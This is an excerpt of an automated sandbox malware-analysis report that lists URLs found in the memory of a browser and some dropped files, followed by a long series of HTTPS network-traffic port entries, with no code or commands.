Source: GVAAAA.16.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: GVAAAA.16.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: GVAAAA.16.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: GVAAAA.16.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: JWBIEC.16.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Decade.com.7.dr, Beverly.6.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: J5PP8Q.16.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: JWBIEC.16.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Beverly.6.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Decade.com.7.dr, Beverly.6.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: chrome.exe, 00000015.00000003.2497922685.0000377800338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000015.00000003.2497922685.0000377800338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000015.00000003.2497922685.0000377800338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2471988956.0000377800CCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/_/og/promos/
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000015.00000003.2471762260.0000377800C30000.00000004.00000800.00020000.00000000.sdmp, J5PP8Q.16.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000015.00000003.2511999983.000037780196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2512454634.0000377801D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2510888695.0000377801C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2510675269.0000377800F98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2510675269.0000377800F98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000015.00000003.2476157989.00003778010B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/url?q=https://google.com/chrome/safety%3Fbrand%3DKFKH%26utm_source%3Dweb%26ut
Source: chrome.exe, 00000015.00000003.2497922685.0000377800338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000015.00000003.2471762260.0000377800C30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000015.00000003.2497922685.0000377800338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000015.00000003.2497922685.0000377800338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000015.00000003.2511999983.000037780196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2511499864.0000377801C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2512454634.0000377801D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2511939493.0000377800F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2510858548.0000377801CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2510826086.0000377801CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.b6tg1FFzATM.2019.O/rt=j/m=q_d
Source: chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
